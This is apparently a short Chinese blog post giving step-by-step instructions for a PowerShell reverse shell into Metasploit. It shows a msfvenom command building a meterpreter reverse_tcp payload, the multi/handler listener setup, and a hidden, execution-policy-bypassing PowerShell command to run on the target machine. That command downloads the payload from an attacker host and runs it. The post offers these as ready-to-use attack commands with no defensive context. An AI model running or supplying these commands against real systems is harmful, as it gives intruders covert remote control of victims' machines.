红炉点雪

PowerShell反弹Shell到Metasploit

一、使用msfvenom生成PS1文件:

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=777 -f psh-reflection >777.ps1

二、开启Metasploit监听:

1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost xxx.xxx.xxx.xxx
set lport 777
run

二、在目标机器执行cmd命令:

1
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.xxx/777.ps1');xx.ps1"

注意区分目标系统是32位还是64位。

CONTACT